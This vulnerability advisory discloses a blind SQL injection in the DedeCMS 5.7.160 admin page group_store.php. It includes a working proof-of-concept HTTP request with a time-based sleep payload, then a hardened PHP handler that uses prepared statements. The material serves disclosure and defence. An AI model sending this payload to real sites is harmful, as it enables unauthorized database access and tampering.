DedeCMS-V5.7.160 backend blind SQL injection in /dede/group_store.php.
Description
Admin backend group store blind SQL injection via POST parameters.
Affected Version
DedeCMS <= 5.7.160
POC
Login to admin backend management.
Send a request to /dede/group_store.php with the GET parameter action=uprank and the POST parameter rank_1=1'+and+sleep(3)+and+'1; this payload leads to a time-based SQL injection.
In the source code of /dede/group_store.php, when the GET parameter action is uprank, every POST value whose key contains rank_ is joined directly into the UPDATE SQL statement, which leads to SQL injection in the update. The joined statement is finally passed to mysqli_query, but for an UPDATE statement this function returns only a boolean value, which is why the injection is blind.
Full POC request:
POST /cms/dedecms/dede/group_store.php?action=uprank HTTP/1.1
Host: 192.168.0.8
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/110.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8
Cookie: menuitems=1_1%2C2_1%2C3_1; PHPSESSID=k5ten9v1ljuogh8pjae2idof0b; _csrf_name_273c7533=e59946ea73ad488a9da6a03897480ac5; _csrf_name_273c75331BH21ANI1AGD297L1FF21LN02BGE1DNG=6c93980ce4934236; DedeUserID=1; DedeUserID1BH21ANI1AGD297L1FF21LN02BGE1DNG=0462031c83e0ae08; DedeLoginTime=1677428501; DedeLoginTime1BH21ANI1AGD297L1FF21LN02BGE1DNG=d9cb1c6293c6c17e; ENV_GOBACK_URL=%2Fcms%2Fdedecms%2Fdede%2Fgroup_store.php
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 29

rank_1=1'+and+sleep(3)+and+'1
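As an added, defender-side example (not DedeCMS's own code), the PHP sketch below shows how a rank_<id> update handler of the kind described above can be hardened: the key shape is whitelisted, the value is validated as an integer, and the UPDATE runs as a prepared statement with bound parameters. The table and column names (dede_store_rank, rank, id) are assumed placeholders.

```php
<?php
// Added example of how the rank_<id> handler described above could be hardened.
// Not DedeCMS's own code; table and column names (dede_store_rank, rank, id)
// are assumed placeholders.

// Step 1: whitelist the key shape and validate the value type before anything
// reaches SQL. Returns [id => rank]; every unexpected key or value is dropped.
function extract_rank_updates(array $post): array
{
    $updates = [];
    foreach ($post as $key => $value) {
        if (!preg_match('/^rank_(\d{1,10})$/', $key, $m)) {
            continue;                        // key must be exactly rank_<digits>
        }
        if (filter_var($value, FILTER_VALIDATE_INT) === false) {
            continue;                        // "1' and sleep(3) and '1" is not an integer
        }
        $updates[(int) $m[1]] = (int) $value;
    }
    return $updates;
}

// Step 2: a prepared statement with bound integer parameters, so the submitted
// values travel as data and can never alter the UPDATE's structure.
function update_ranks_hardened(mysqli $db, array $post): int
{
    $stmt = $db->prepare('UPDATE dede_store_rank SET rank = ? WHERE id = ?');
    if ($stmt === false) {
        throw new RuntimeException('prepare failed: ' . $db->error);
    }
    $rank = 0;
    $id   = 0;
    $stmt->bind_param('ii', $rank, $id);     // bound by reference, reassigned per row
    $affected = 0;
    foreach (extract_rank_updates($post) as $id => $rank) {
        $stmt->execute();
        $affected += $stmt->affected_rows;
    }
    $stmt->close();
    return $affected;
}
```

With this shape, the request body shown above yields an empty update set from extract_rank_updates(), so no statement is executed at all.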
Reference
Reported by Srpopty; vulnerability discovered using Corax.